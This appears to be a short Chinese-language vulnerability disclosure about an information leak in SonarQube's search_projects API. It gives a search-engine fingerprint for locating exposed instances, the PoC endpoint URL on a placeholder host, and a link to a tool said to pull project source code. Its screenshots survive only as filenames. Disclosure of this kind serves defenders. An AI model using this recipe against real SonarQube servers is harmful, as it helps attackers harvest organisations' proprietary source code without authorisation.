SonarQube search_projects 项目信息泄露漏洞

漏洞描述

SonarQube 某接口存在信息泄露漏洞,可以通过工具下载源码。

漏洞影响

SonarQube

网络测绘

app=”sonarQube-代码管理”

漏洞复现

主页如下

20240428152916726-1628578104263-4058ad67-3556-4948-bb84-80b780f6a808.f6852e92_2024-04-28_15-29-04 (1)

漏洞POC

http://xxx.xxx.xxx.xxx/api/components/search_projects

20240428153022739-1628578139002-6ae5f685-2e56-488e-9bd8-ca7c17d40416.253c8829_2024-04-28_15-29-59 (1)

可通过工具下载项目中的源代码

https://github.com/deletescape/sloot

20240428153135885-1628578178570-b0b44348-d38e-4988-975a-f7540c3871c1.51f4bf4c_2024-04-28_15-31-03 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容